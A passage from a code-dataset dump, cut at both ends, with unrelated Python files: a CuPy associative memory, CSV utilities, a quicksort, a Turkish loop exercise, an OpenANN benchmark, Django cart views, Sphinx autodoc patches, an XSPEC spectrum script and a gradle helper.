cupy.bool)\n vector -= min_value\n for offset in range(-padding,padding+1):\n for vecOff,i in zip(vector+offset,cupy.arange(vector.shape[0])):\n if vecOff <= input_range and vecOff >= min_value: \n grid[int(vecOff), i] = True\n grid = cupy.flipud(grid)\n return grid\n \n \n @staticmethod\n def impl(a,b):\n return cupy.logical_or(cupy.logical_not(a),b)\n \n \n\n def abstract(self, vector_input, input_range=2, min_value=0) -> None:\n if vector_input.size != self.n:\n raise ValueError('Invalid size of the input data.')\n else:\n grid_input = self.vector_to_grid_pad(vector_input, input_range,\n min_value, int(numpy.round(0.1*input_range)) )\n #self.grid = self.grid | grid_input\n self.grid = cupy.logical_or(self.grid,grid_input)\n \n \n\n def reduce(self, vector_input, input_range=2, min_value=0):\n if vector_input.size != self.n:\n raise AssociativeMemoryError('Invalid size of the input data.')\n else:\n grid_input = self.vector_to_grid(vector_input,\n input_range, min_value)\n #grid_output = cupy.zeros(self.grid.shape, dtype=self.grid.dtype)\n '''\n for i, cols in enumerate(zip(self.grid.T, grid_input.T)):\n (i1, ) = cupy.nonzero(cols[0])\n (i2, ) = cupy.nonzero(cols[1])\n #if cupy.all(self.in1d(i2,i1)):\n if cupy.all(self.impl(cols[0],cols[1])):\n # TODO: finish the reduce operation\n #if i1.size == i2.size:\n pass\n # grid_output[0:255, i] =\n else:\n raise AssociativeMemoryError('Applicability '\n 'condition error.')\n '''\n grid_imp=self.impl(grid_input,self.grid)\n if cupy.all(grid_imp):\n return True\n else:\n #raise AssociativeMemoryError('Applicability condition error.')\n return False\n\n \n \n #return grid_input\n","sub_path":"Reconocedor/associative_gpu.py","file_name":"associative_gpu.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"105688168","text":"# -*- coding: utf-8 -*-\n\"\"\"Some utility functions\"\"\"\n\nimport csv\nimport re\nimport sys\nimport logging\n\nLOG = logging.getLogger(__name__)\n\n\n# From https://docs.python.org/2/library/csv.html\ndef _unicode_csv_reader(unicode_csv_data, dialect=csv.excel, **kwargs):\n # csv.py doesn't do Unicode; encode temporarily as UTF-8:\n csv_reader = csv.reader(utf_8_encoder(unicode_csv_data),\n dialect=dialect, **kwargs)\n for row in csv_reader:\n # decode UTF-8 back to Unicode, cell by cell:\n yield [unicode(cell, 'utf-8') for cell in row]\n\n\ndef _unicode_csv_dict_reader(unicode_csv_data, fieldnames=None, **kwargs):\n if fieldnames:\n fieldnames = [val.encode('utf-8') for val in fieldnames]\n csv_reader = csv.DictReader(unicode_csv_data,\n fieldnames=fieldnames, **kwargs)\n for row in csv_reader:\n # decode UTF-8 back to Unicode, cell by cell:\n yield {unicode(key, 'utf-8'): unicode(value, 'utf-8') for key, value in row.items()}\n\n\ndef utf_8_encoder(unicode_csv_data):\n for line in unicode_csv_data:\n yield line.encode('utf-8')\n\n\ndef _matching_lines_py2(input_stream, pattern_string, include_header=False):\n \"\"\"return lines that match a regular expression pattern\"\"\"\n pattern = re.compile(pattern_string)\n this_is_header = include_header\n for line in input_stream:\n if this_is_header:\n yield line\n this_is_header = False\n else:\n if pattern.match(unicode(line, 'utf-8')):\n yield line\n\n\ndef _matching_lines_py3(input_stream, pattern_string, include_header=False):\n \"\"\"return lines that match a regular expression pattern\"\"\"\n pattern = re.compile(pattern_string)\n this_is_header = include_header\n for line in input_stream:\n if this_is_header:\n yield line\n this_is_header = False\n else:\n if pattern.match(line):\n yield line\n\n\nif sys.version_info[0] == 3:\n unicode_csv_dict_reader = csv.DictReader\n unicode_csv_reader = csv.reader\n matching_lines = _matching_lines_py3\nelse:\n unicode_csv_dict_reader = _unicode_csv_dict_reader\n unicode_csv_reader = _unicode_csv_reader\n matching_lines = _matching_lines_py2\n","sub_path":"older/rc-query-csv/rc_query_csv/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259922892","text":"def Quicksort(arr, start, end):\n\tif (end > start):\n\t\tpivot = Partition(arr, start, end)\n\t\tQuicksort(arr, start, pivot - 1)\n\t\tQuicksort(arr, pivot + 1, end)\n\ndef Partition(arr, p, q):\n\tpivot = q\n\ti = p - 1\n\tfor j in range(p, pivot):\n\t\tif (arr[j] < arr[pivot]):\n\t\t\ti += 1\n\t\t\tarr[i], arr[j] = arr[j], arr[i]\n\tpivot = i + 1\n\tarr.insert(pivot, arr.pop(q))\n\treturn pivot\n\nl = [10, 5, 6, 1, 7, 12, 5, 6, 124]\nQuicksort(l, 0, len(l) - 1)\nprint (l)","sub_path":"Sorting Algorithms (Python)/Sorting_Algorithms__Python_.py","file_name":"Sorting_Algorithms__Python_.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"562105315","text":"#i=1\r\n#while i<5:\r\n #print(\"değere +1 eklendi\",i)\r\n #i=i+1\r\n#--------------------------------------\r\n#ilk önce i=1 while döngüsü içine girdi. i 5'den küçük olduğu için bir satır\r\n#aşağı indi ve i=1 ifadesini ekrana yazdırdı. Sonra bu i değerine +1 ekledi\r\n#sonra döngünün en başına döndü. yine i<5 şartını sağlayaıp sağlamadığına\r\n#baktı. i=2 idi. i<5 şartını sağladığı için bir satır aşağı indi.\r\n#i değerini ekrana yazdırdı. Sonra bu i değerine +1 ekledi ve 3 oldu.\r\n#tekrar döngünün en başına döndü ve i=4 idi ve i<5 şartını sağlayıp sağlamadığını\r\n#kontrol etti. bir alt satıra indi ve 4 değerini ekrana yazdırdı. ondan sonra\r\n#i değerine +1 ekledi ve 5 oldu. döngünün başına döndü ve i<5 şartını\r\n#sağlayıp sağlamadığını kontrol etti. Bu sefer i=5 i<5 sağlamadığından\r\n#döngü durdu.\r\n\r\n#-------------------------------------------------------------\r\n\r\n#i=0\r\n#liste=[]\r\n#while i<5:\r\n #i=i+1\r\n #print(\"İ değeri +1 arttırıldı ve listeye eklendi:\",i)\r\n #liste.append(i)\r\n #print(liste)\r\n\r\n#-------------------------------------------------------------\r\n\r\n#yas=35\r\n#while yas<45:\r\n #yas=yas+1\r\n #print(\"yeni yaşınız kutlu olsun:\",yas)\r\n\r\n#----------------------------------------------------------\r\n \r\n#while True:\r\n #deger=input(\"çıkmak için q tuşuna basınız\")\r\n #if deger ==\"q\":\r\n #break\r\n #else :\r\n #print(\"yarra yedin\")\r\n\r\n#------------------------------------------------\r\n\r\n\r\n#ORGANİK ARAMA-ÜCRETLİ REKLAMLAR - SOSYAL MEDYA\r\n\r\norganık=[]\r\nucretlıreklam=[]\r\nsosyalmedya=[]\r\n\r\nwhile True:\r\n x=input(\"ORGANİK ARAMA-Aramak istediğiniz bilgiyi yazınız.(Organik Arama Kanalından Çıkış İçin 'q' bas.)\")\r\n organık.append(x)\r\n print(\"Organik Arama Geçmişine Bir Bilgi Eklenerek +1 Arttırıldı.\")\r\n print(len(organık))\r\n if x==\"q\":\r\n print(\"Organik Arama Kanalından Çıkış Yaptınız akabinde Ücretli Reklam Arama Kanalına Geçtiniz.\")\r\n break\r\n elif x==\"q\":\r\n continue\r\n\r\n\r\nwhile True:\r\n y=input(\"Ücretli ARAMA-Aramak İstediğiniz bilgiyi yazınız.(Ücretli Arama Kanalından Çıkış İçin 'q' bas.)\")\r\n ucretlıreklam.append(y)\r\n print(\"Ücretli Arama Geçmişine Bir Bilgi Eklenerek +1 Arttırıldı\")\r\n print(len(ucretlıreklam))\r\n if y==\"q\":\r\n print(\"Ücretli Arama Kanalından Çıkış Yaptınız Akabinde Sosyal Medya Arama Kanalına Geçiş Yaptınız.\")\r\n break\r\n elif y==\"q\":\r\n continue\r\n\r\n\r\nwhile True:\r\n z=input(\"SOSYAL MEDYA ARAMASI-Aramak istediğiniz bilgiyi yazınız.(Sosyal Medya Arama Kanalından Çıkış için 'q' bas.)\")\r\n sosyalmedya.append(z)\r\n print(\"Sosyal Medya Arama Geçmişine Bir Bilgi Eklenerek +1 Arttırıldı.\")\r\n print(len(sosyalmedya))\r\n if z==\"q\":\r\n print(\"Sosyal Medya Arama Kanalından Çıkış Yaptınız.\")\r\n break\r\n elif z==\"q\":\r\n continue\r\n \r\n\r\n\r\n\r\ndef saydır(organık):\r\n h=input(\"Organik Reklam Araması Saydırmak İçin k Tuşuna Basınız.\")\r\n if h==\"k\":\r\n print(\"Organik Reklam Arama Sayısı:\",len(organık))\r\n \r\nsaydır(organık)\r\n\r\ndef saydır2(ucretlıreklam):\r\n m=input(\"Ücretli Reklam Araması Saydırmak İçin b Tuşuna Basınız.\")\r\n if m==\"b\":\r\n print(\"Ücretli Reklam Arama Sayısı:\",len(ucretlıreklam))\r\n \r\nsaydır2(ucretlıreklam)\r\n\r\ndef saydır3(sosyalmedya):\r\n n=input(\"Sosyal Medya Araması Saydırmak İçin v Tuşuna Basınız.\")\r\n if n==\"v\":\r\n print(\"Sosyal Medya Araması Sayısı:\",len(sosyalmedya))\r\n \r\nsaydır3(sosyalmedya)\r\n\r\n\r\nif len(organık) > len(ucretlıreklam):\r\n print(\"Organik Arama Sayısı Ücretli Reklam Arama Sayısından Daha Fazladır.\")\r\nelse :\r\n print(\"Ücretli Reklam Arama Sayıı Organik Reklam Arama Sayısından Daha Fazladır.\")\r\n\r\nif len(organık) > len(sosyalmedya):\r\n print(\"Organik Arama Sayısı Sosyal Medya Arama Sayısından Daha Fazladır.\")\r\nelse :\r\n print(\"Sosyal Medya Arama Sayısı Organik Arama Sayısından Daha Fazladır.\")\r\nif len(sosyalmedya) > len(ucretlıreklam):\r\n print(\"Sosyal Medya Arama Sayısı Ücretli Reklam Arama Sayısından Daha Fazladır.\")\r\nelse :\r\n print(\"Ücretli Reklam Arama Sayısı Sosyal Medya Arama Sayısından Daha Fazladır.\")\r\n \r\n \r\n\r\n\r\n \r\n","sub_path":"while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"209520031","text":"import sys\ntry:\n from sklearn import datasets\nexcept:\n print(\"scikit-learn is required to run this example.\")\n exit(1)\ntry:\n from openann import *\nexcept:\n print(\"OpenANN Python bindings are not installed!\")\n exit(1)\n\n#NOTE: LABELS ARE 0-INDEXED, UNLIKE WITH LOGISTIC REGRESSION\n\nHOG_TRAINING_DATA = 'data/hog_training_data.npy'\nHOG_TRAINING_LABELS = 'data/hog_training_labels.npy'\nHOG_TESTING_DATA = 'data/hog_testing_data.npy'\nHOG_TESTING_LABELS = 'data/hog_testing_labels.npy'\n\ndef print_usage():\n print(\"Usage:\")\n print(\" python benchmark [run]\")\n\ndef run_ann():\n\n train_labels = numpy.load(HOG_TRAINING_LABELS)\n train_features = numpy.load(HOG_TRAINING_DATA)\n test_labels = numpy.load(HOG_TESTING_LABELS)\n test_features = numpy.load(HOG_TESTING_DATA)\n\n total_features = numpy.concatenate((train_features, test_features), axis=0)\n total_labels = numpy.concatenate((train_labels, test_labels), axis=0)\n\n X = numpy.array(total_features)\n Y = numpy.array(total_labels)\n Y = Y - 1\n D = X.shape[1]\n F = len(numpy.unique(Y))\n N = len(X)\n\n # Preprocess data (normalization and 1-of-c encoding)\n stds = X.std(axis=0)\n for i in range (0, len(stds)):\n if stds[i] == 0:\n stds[i] = 1\n X = (X - X.mean(axis=0)) / stds\n T = numpy.zeros((N, F))\n T[(range(N), Y)] = 1.0\n\n # Setup network\n net = Net()\n net.set_regularization(0.01, 0.01, 0)\n net.input_layer(D)\n net.fully_connected_layer(100, Activation.LOGISTIC)\n net.output_layer(F, Activation.SOFTMAX)\n net.set_error_function(Error.CE)\n\n # Split dataset into training set and validation set and make sure that\n # each class is equally distributed in the datasets\n X1 = numpy.vstack((X[0:(N/2)]))\n T1 = numpy.vstack((T[0:(N/2)]))\n training_set = DataSet(X1, T1)\n X2 = numpy.vstack((X[(N/2):]))\n T2 = numpy.vstack((T[(N/2):]))\n validation_set = DataSet(X2, T2)\n\n # Train for 30 episodes (with tuned parameters for MBSGD)\n optimizer = MBSGD({\"maximal_iterations\": 30}, learning_rate=0.9,\n learning_rate_decay=0.999, min_learning_rate=0.001, momentum=0.5,\n batch_size=128)\n Log.set_info() # Deactivate debug output\n optimizer.optimize(net, training_set)\n\n print(\"TF data set has %d inputs, %d classes and %d examples\" % (D, F, N))\n print(\"The data has been split up input training and validation set.\")\n training_percent = float(classification_hits(net, training_set)) / len(X1)\n testing_percent = float(classification_hits(net, validation_set)) / len(X2)\n print(\"Correct predictions on training set: %d/%d, and percent is: %f\"\n % (classification_hits(net, training_set), len(X1), training_percent))\n print(\"Confusion matrix:\")\n print(confusion_matrix(net, training_set)[0])\n print(\"Correct predictions on test set: %d/%d, and percent is: %f\"\n % (classification_hits(net, validation_set), len(X2), testing_percent))\n print(\"Confusion matrix:\")\n print(confusion_matrix(net, validation_set)[0])\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n print_usage()\n\n for command in sys.argv[1:]:\n if command == \"run\":\n run_ann()\n\n else:\n print_usage()\n exit(1)","sub_path":"src/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"255842924","text":"from django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render, redirect\nfrom django.utils import timezone\n\nfrom django.views.generic import ListView\nfrom django.views.generic.base import View\n\nfrom apps.order.models import Cart, CartItem, Order\nfrom apps.product.models import Product\n\nfrom .forms import OrderForm\nfrom .permissions import SuperUserAdminMixin\n\nUser = get_user_model()\n\n\nclass IndexAdminView(SuperUserAdminMixin, ListView):\n model = Order\n template_name = 'order/index_admin_panel.html'\n context_object_name = 'orders'\n\n def get_queryset(self):\n queryset = super(IndexAdminView, self).get_queryset()\n today_ = timezone.now().date()\n queryset = queryset.filter(create_at__date=today_).order_by('-create_at')\n return queryset\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data()\n context['count'] = Order.objects.count()\n return context\n\n\n\ndef order_detail(request):\n return render(request, 'order/order_detail.html')\n\n\nclass CartItemView(View):\n\n def get(self, request, *args, **kwargs):\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user)\n cart_items = CartItem.objects.filter(cart=cart)\n context = {\n 'cart': cart,\n 'cart_items': cart_items,\n }\n return render(request, 'order/cart_checkout.html', context)\n\n\n\nclass AddToCartView(View):\n\n def get(self, request, *args, **kwargs):\n product_id = kwargs.get('pk')\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user, in_order=False)\n product_info = Product.objects.get(pk=product_id)\n CartItem.objects.get_or_create(cart=cart, product=product_info, final_price=product_info.price)\n messages.add_message(request, messages.INFO, 'Продукт успешно добавлен!')\n return redirect('cart')\n\n\nclass DeleteCartItemView(View):\n\n def get(self, request, *args, **kwargs):\n product_id = kwargs.get('pk')\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user, in_order=False)\n product_id = Product.objects.get(pk=product_id)\n cart_product = CartItem.objects.get(cart=cart, product=product_id)\n cart_product.delete()\n cart.save()\n messages.add_message(request, messages.INFO, 'Продукт успешно удален!')\n return redirect('cart')\n\n\nclass ChangeQuantityView(View):\n\n def post(self, request, *args, **kwargs):\n product_id = kwargs.get('pk')\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user, in_order=False)\n product_id = Product.objects.get(pk=product_id)\n cart_product = CartItem.objects.get(cart=cart, product=product_id)\n qty = int(request.POST.get('change_qty'))\n cart_product.qty = qty\n cart_product.final_price = cart_product.product.price * cart_product.qty\n cart_product.save()\n cart.save()\n messages.add_message(request, messages.INFO, 'Количество успешно изменено!')\n return redirect('cart')\n\n\nclass OrderCheckoutView(View):\n\n def get(self, request, *args, **kwargs):\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user)\n cart_items = CartItem.objects.filter(cart=cart)\n form = OrderForm(request.POST, None)\n context = {\n 'cart': cart,\n 'cart_items': cart_items,\n 'form': form,\n }\n return render(request, 'order/order_checkout.html', context)\n\n\nclass MakeOrderView(View):\n\n def post(self, request, *args, **kwargs):\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user)\n form = OrderForm(request.POST, None)\n if form.is_valid():\n new_order = form.save(commit=False)\n cart.in_order = True\n new_order.cart = cart\n new_order.customer = user\n new_order.save()\n messages.add_message(request, messages.INFO, 'Спасибо за заказ! Менеджер с Вами свяжется')\n return redirect('index')\n return redirect('order_checkout')\n\n\nclass UpdateOrderAdminView(View):\n\n def post(self, request, *args, **kwargs):\n pass","sub_path":"apps/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"8737807","text":"# type: ignore\n\nfrom typing import get_type_hints, Any, List, Optional, Type, Tuple\n\nfrom django.db.models.base import Model\nfrom django.db.models.fields import AutoField\nfrom django.db.models.fields.related_descriptors import (\n ForeignKeyDeferredAttribute,\n ReverseManyToOneDescriptor,\n ReverseOneToOneDescriptor,\n)\nfrom django.db.models.manager import ManagerDescriptor\nfrom django.db.models.query import QuerySet\nfrom django.db.models.query_utils import DeferredAttribute\n\nfrom sphinx.application import Sphinx\nfrom sphinx.ext.autodoc import DataDocumenter, Options, PropertyDocumenter\n\n\ndef _get_module(cls: Optional[Type]) -> str:\n if not hasattr(cls, '__module__'):\n return 'builtins'\n if not cls.__module__.startswith('django'):\n return cls.__module__.lstrip('_')\n django_references = {\n 'django.db.models',\n 'django.forms',\n 'django.contrib.admin',\n 'django.http',\n 'django.core.files',\n 'django.apps',\n 'django.core.management',\n }\n excluded_names = {\n 'QuerySet',\n 'FieldFile',\n 'FileSystemStorage',\n 'BaseInlineFormSet',\n }\n for ref in django_references:\n if cls.__name__ in excluded_names:\n continue\n if cls.__module__.startswith(ref):\n return ref\n return cls.__module__\n\n\ndef _patched_add_directive_header(self: DataDocumenter, sig: str):\n # Don't document values of settings\n if self.modname == 'MangAdventure.settings':\n super(DataDocumenter, self).add_directive_header(sig)\n else:\n self._original_add_directive_header(sig)\n\n\ndef _patched_can_document_member(cls: Type[PropertyDocumenter],\n member: Any, membername: str,\n isattr: bool, parent: Any) -> bool:\n return member.__class__.__name__ == 'cached_property' or \\\n cls._original_can_document_member(member, membername, isattr, parent)\n\n\ndef apply_patches(app: Sphinx):\n import sphinx_autodoc_typehints\n\n sphinx_autodoc_typehints.get_annotation_module = _get_module\n\n PropertyDocumenter._original_can_document_member = \\\n PropertyDocumenter.can_document_member\n PropertyDocumenter.can_document_member = \\\n classmethod(_patched_can_document_member)\n\n DataDocumenter._original_add_directive_header = \\\n DataDocumenter.add_directive_header\n DataDocumenter.add_directive_header = _patched_add_directive_header\n\n ManagerDescriptor.__get__ = lambda self, *args, **kwargs: self.manager\n\n QuerySet.__repr__ = lambda self: self.__class__.__name__\n\n\ndef skip_django_junk(app: Sphinx, what: str, name: str,\n obj: Any, skip: bool, options: Options) -> bool:\n junk = (\n ForeignKeyDeferredAttribute,\n ReverseManyToOneDescriptor,\n ReverseOneToOneDescriptor,\n )\n if isinstance(obj, junk):\n return True\n if isinstance(obj, property):\n return name == 'media' or skip\n if isinstance(obj, DeferredAttribute):\n return isinstance(obj.field, AutoField) or skip\n return name == 'do_not_call_in_templates' or skip\n\n\ndef process_signature(app: Sphinx, what: str, name: str, obj: Any, options:\n Options, signature: Optional[str], return_annotation:\n Optional[str]) -> Tuple[Optional[str], Optional[str]]:\n if what != 'class':\n return signature, return_annotation\n if issubclass(obj, Model):\n signature, return_annotation = '(*args, **kwargs)', None\n for idx, base in enumerate(obj.__bases__):\n module = _get_module(base)\n if module != 'builtins':\n obj.__bases__[idx].__module__ = module\n return signature, return_annotation\n\n\ndef process_docstring(app: Sphinx, what: str, name: str, obj:\n Any, options: Options, lines: List[str]):\n if obj is None or not lines:\n return\n # this class is broken for some reason\n if name[:28] == 'users.forms.UserProfileForm.':\n cls = {\n 'email': 'EmailField', 'avatar': 'ImageField'\n }.get(name[28:], 'CharField')\n lines[0] = f':class:`~django.forms.{cls}` - {lines[0]}'\n return\n # this one too\n if name == 'users.admin.UserForm.is_scanlator':\n lines[0] = f':class:`~django.forms.BooleanField` - {lines[0]}'\n return\n if what == 'attribute':\n cls = getattr(obj, 'field', obj).__class__\n elif what == 'property':\n func = getattr(obj, 'fget', obj.func)\n cls = get_type_hints(func)['return']\n else:\n return\n if cls.__module__ == 'builtins':\n qname = cls.__name__\n elif cls.__name__ in {'dict', 'list', 'tuple'}:\n qname = f'typing.{cls.__name__.capitalize()}'\n else:\n qname = f'{_get_module(cls)}.{cls.__name__}'\n lines[0] = f':class:`~{qname}` – {lines[0]}'\n\n\ndef setup(app: Sphinx):\n app.connect('builder-inited', apply_patches)\n app.connect('autodoc-skip-member', skip_django_junk)\n app.connect('autodoc-process-signature', process_signature)\n app.connect('autodoc-process-docstring', process_docstring)\n app.add_css_file('css/style.css')\n","sub_path":"docs/_ext/mangadventure_patches.py","file_name":"mangadventure_patches.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"191565711","text":"\n\n\"\"\"\nplots the AGN spectra from the torus model for different obscuration levels.\n\noutput:\n/home/comparat/wwwDir/eRoMok/taurus/*.png\n\"\"\"\nimport xspec\nimport numpy as n\nimport sys\nimport astropy.units as uu\nimport astropy.constants as cc \nfrom scipy.interpolate import interp1d\nfrom scipy.integrate import quad\n\nxspec.Xset.cosmo = \"67.77 0. 0.692885\"\nPL=1.9\n#xspec.Xset.cosmo = \"50. 0. 0.5\"\n#xspec.Response()\n\n#s1 = xspec.Spectrum(\"arf01_100nmAl_200nmPI_sdtq.fits\")\n#b1 = s1.background\n#r1 = s1.response\n#arfFileName = r1.arf\n\nnh_vals = 10**n.arange(-2,4+0.01,2.)#0.05)\nz_vals = n.arange(0., 4.1, 1.)\n\nnh_val = 1000.# nh_vals[0]\nredshift = 2. # z_vals[0]\n\n\nll_05 = (cc.c * cc.h / (0.5*uu.keV).to(uu.J)).to(uu.AA)\nll_2 = (cc.c * cc.h / (2.0*uu.keV).to(uu.J)).to(uu.AA)\nll_10 = (cc.c * cc.h / (10*uu.keV).to(uu.J)).to(uu.AA)\n\n\n#fs1 = xspec.FakeitSettings(os.path.join(os.environ['DARKSIM_DIR'], 'model', \"arf01_100nmAl_200nmPI_sdtq.fits\"), exposure = 1500.0)\n#fs1.background = \"none\"\n\nimport matplotlib\nmatplotlib.use('Agg')\nmatplotlib.rcParams.update({'font.size': 14})\nimport matplotlib.pyplot as p\nimport numpy as n\nimport os\n#torus_model = os.path.join(os.environ['DARKSIM_DIR'], 'model', 'torus1006.fits')\n#print(torus_model)\n\n## reproduce the model from Aird 2015\n\n\ndef get_spec(\n\tnh_val = 1\n\t,PL=1.9 \n\t,redshift=0.\n\t,norm1 = 0.98\n\t,norm2 = 0.02\n\t,norm3 = 1.\n\t,rel_refl= 1.\n\t,incl = n.cos(30.*n.pi/180.)\n\t):\n\n\tm1 = xspec.Model(\"zwabs*(cabs*zpowerlw*zhighect+pexrav)+zpowerlw\")\n\n\tm1.setPars(\n\tnh_val, #2 2 zwabs nH 10^22 1.00000 +/- 0.0 \n\tredshift, #3 2 zwabs Redshift 0.0 frozen\n\tnh_val, #4 3 cabs nH 10^22 1.00000 +/- 0.0 \n\tPL, #5 4 zpowerlw PhoIndex 1.00000 +/- 0.0 \n\tredshift, #6 4 zpowerlw Redshift 0.0 frozen\n\tnorm1, #7 4 zpowerlw norm 1.00000 +/- 0.0 \n\t50., #8 5 zhighect cutoffE keV 10.0000 +/- 0.0 \n\t200., #9 5 zhighect foldE keV 15.0000 +/- 0.0 \n\tredshift, #10 5 zhighect Redshift 0.0 frozen\n\tPL, #16 8 pexrav PhoIndex 2.00000 +/- 0.0 \n\t200., #17 8 pexrav foldE keV 100.000 +/- 0.0 \n\trel_refl, #18 8 pexrav rel_refl 0.0 +/- 0.0 \n\tredshift, #19 8 pexrav Redshift 0.0 frozen\n\t1., #20 8 pexrav abund 1.00000 frozen\n\t1., #21 8 pexrav Fe_abund 1.00000 frozen\n\tincl, #22 8 pexrav cosIncl 0.450000 frozen\n\tnorm3, #23 8 pexrav norm 1.00000 +/- 0.0 \n\tPL, #11 6 zpowerlw PhoIndex 1.00000 +/- 0.0 \n\tredshift, #12 6 zpowerlw Redshift 0.0 frozen\n\tnorm2 #13 6 zpowerlw norm 1.00000 +/- 0.0 \n\t)\n\n\n\t#kevs = n.arange(0.1, 50, 0.1) #\n\tkevs = 10**n.arange(-1.,n.log10(50),0.01)\n\tfluxes = []\n\tnPh = []\n\tfor kev_min_erosita_RF, kev_max_erosita_RF in zip(kevs[:-1],kevs[1:]):\n\t\txspec.AllModels.calcFlux(str(kev_min_erosita_RF)+\" \"+str(kev_max_erosita_RF))\n\t\t#print(xspec.Xset.cosmo)\n\t\t#xspec.AllModels.calcLumin(str(kev_min_erosita_RF)+\" \"+str(kev_max_erosita_RF))\n\t\tfluxes.append( m1.flux[0] )\n\t\tnPh.append(m1.flux[3] )\n\t\tx,y,nP,dE = (kevs[:-1]+kevs[1:])*0.5, n.array(fluxes), n.array(nPh), -kevs[:-1]+kevs[1:]\n\n\t# x keV\n\t# y/dE erg/(cm$^2$ s keV)\n\t# nP number of photons\n\t# energy interval\n\t# E = hc/lambda\n\t# x * y / dE = nu * f_nu = ll * f_ll\n\n\tll = (cc.c * cc.h / (x*uu.keV).to(uu.J)).to(uu.AA)\n\n\tf_ll = x * y / (dE * ll ) # erg/(cm$^2$ s A)\n\n\treturn ll, f_ll, x, y/dE, nP, dE\n\n\ndef get_ratio(ll, f_ll_20):\n\titp = interp1d(ll, f_ll_20/n.median(f_ll_20))\n\tF2_10 = quad(itp, ll_10.value, ll_2.value)[0]\n\tF05_2 = quad(itp, ll_2.value, ll_05.value)[0]\n\treturn F05_2/F2_10\n\nnh_vals = 10**n.arange(-2.1,4.11,0.1)#0.05)\nratios = n.zeros_like(nh_vals)\nfor ii, nh_val in enumerate(nh_vals):\n\tll, f_ll, x, fnu, nP, dE = get_spec( nh_val )\n\tn.savetxt(os.path.join('xspectrum-flambda-'+str(n.round(n.log10(nh_val),1))+'.txt'), n.transpose([ll, f_ll, x, fnu, nP, dE]) )\n\tratios[ii] = get_ratio(ll, f_ll)\n\nn.savetxt(os.path.join(os.environ['GIT_VS'], 'data', 'xray_k_correction', 'hard-2-soft-z0.txt'), n.transpose([n.log10(nh_vals*1e22), ratios]) )\n\np.figure(1, (6,6))\np.plot(nh_vals*1e22, ratios)\np.xscale('log')\np.yscale('log')\np.xlabel(r'$\\log_{10}(n_H)$')\np.ylabel('$F_{0.5-2}/F_{2-10}$')\n#p.legend(frameon=False, loc=0, fontsize=9)\np.tight_layout() \np.savefig(os.path.join(os.environ['GIT_VS'], 'figures', 'MD10/agn/NH', 'hard-2-soft-z0.png'))\np.clf()\n\n\nll, f_ll_21, x, fnu, nP, dE = get_spec( nh_val = 0.1, PL=1.9 )\nll, f_ll_22, x, fnu, nP, dE = get_spec( nh_val = 1, PL=1.9 )\nll, f_ll_23, x, fnu, nP, dE = get_spec( nh_val = 10, PL=1.9 )\nll, f_ll_24, x, fnu, nP, dE = get_spec( nh_val = 100, PL=1.9 )\nll, f_ll_25, x, fnu, nP, dE = get_spec( nh_val = 1000, PL=1.9 )\nll, f_ll_26, x, fnu, nP, dE = get_spec( nh_val = 10000, PL=1.9 )\n\n\np.figure(1, (7,4))\np.axvline(ll_05.value, label = '0.5 keV')\np.axvline(ll_2.value, label = '2 keV', ls='dashed')\np.axvline(ll_10.value, label = '10 keV', ls='dotted')\np.plot(ll, f_ll_20, label='20')\np.plot(ll, f_ll_21, label='21')\np.plot(ll, f_ll_22, label='22')\np.plot(ll, f_ll_23, label='23')\np.plot(ll, f_ll_24, label='24')\np.plot(ll, f_ll_25, label='25')\np.plot(ll, f_ll_26, label='26')\np.xscale('log')\np.yscale('log')\np.xlabel('wavelength [Angstrom]')\np.ylabel('flux density $f_\\lambda$ [erg/(cm$^2$ s A)]')\np.legend(frameon=False, loc=0, fontsize=9)\np.tight_layout() \np.savefig('ll_f_ll.png')\np.clf()\n","sub_path":"xspec/tabulate_xray_spectra_flambda_RF_soft_hard_conversion.py","file_name":"tabulate_xray_spectra_flambda_RF_soft_hard_conversion.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296020550","text":"from subprocess import run, CalledProcessError\nimport sys, os, shutil\nfrom .prompt import prompt_confirm\n\njoinp = os.path.join\n\ndef gradle(task, params={}, spinner=None, verbose=False):\n command = './gradlew {}' .format(task)\n for key in params:\n command += ' ' + '-P{}={}'.format(key, params[key])\n return run_command(command, spinner=spinner, verbose=verbose)\n\n\ndef run_command(task, spinner=None, verbose=False, stop_spinner_on_success=True):\n try:\n if verbose and spinner:\n spinner.hide()\n p = run(task, shell=True, check=True, capture_output=not verbose)\n if verbose and spinner:\n spinner.show()\n if stop_spinner_on_success and spinner:\n spinner.succeed()\n\n return True\n except CalledProcessError as e:\n if spinner:\n spinner.fail()\n if not verbose and prompt_confirm('The command failed, should I print the output?', True):\n sys.stdout.write(e.stdout.decode('utf-8'))\n sys.stderr.write(e.stderr.decode('utf-8'))\n return False\n\n\ndef start_spinner(message):\n from yaspin import yaspin\n spinner = yaspin(text=message)\n\n _ok = spinner.ok\n _fail = spinner.fail\n \n def succeed():\n spinner.color = 